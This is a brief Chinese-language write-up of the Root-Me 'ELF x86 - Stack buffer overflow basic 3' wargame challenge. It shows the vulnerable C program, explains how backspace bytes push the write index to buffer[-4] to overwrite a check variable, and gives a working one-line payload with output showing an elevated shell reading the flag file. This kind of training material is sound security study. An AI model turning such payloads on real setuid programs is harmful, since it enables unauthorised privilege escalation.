Stack buffer overflow basic 3

发表于 分类于 阅读次数: Valine:
本文字数: 1.4k 阅读时长 ≈ 1 分钟

ELF x86 - Stack buffer overflow basic 3

参考:: https://github.com/s1syphu5/RootMe-Challenges/tree/master/System/ELF%20x86%20-%20Stack%20buffer%20overflow%20basic%203

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

void shell(void);
 
int main()
{
 
  char buffer[64];
  int check;
  int i = 0;
  int count = 0;
 
  printf("Enter your name: ");
  fflush(stdout);
  while(1)
    {
      if(count >= 64)
        printf("Oh no...Sorry !\n");
      if(check == 0xbffffabc)
        shell();
      else
        {
            read(fileno(stdin),&i,1);
            switch(i)
            {
                case '\n':
                  printf("\a");
                  break;
                case 0x08:
                  count--;
                  printf("\b");
                  break;
                case 0x04:
                  printf("\t");
                  count++;
                  break;
                case 0x90:
                  printf("\a");
                  count++;
                  break;
                default:
                  buffer[count] = i;
                  count++;
                  break;
            }
        }
    }
}
 
void shell(void)
{
  setreuid(geteuid(), geteuid());
  system("/bin/bash");
}

0x0804866a <+116>: cmp DWORD PTR [ebp-0x50],0xbffffabc

如果 buffer[count] 指向 check的地址, 那么buffer[count] = i就可以把输入值赋给check
将count减为-4,buffer[-4]就相当于buffer地址减去4

app-systeme-ch16@challenge02:~$ (python -c 'print "\x08"*4+"\xbc\xfa\xff\xbf"';cat )| ./ch16
Enter your name: id
uid=1216(app-systeme-ch16-cracked) gid=1116(app-systeme-ch16) groups=1116(app-systeme-ch16),100(users)
cat .passwd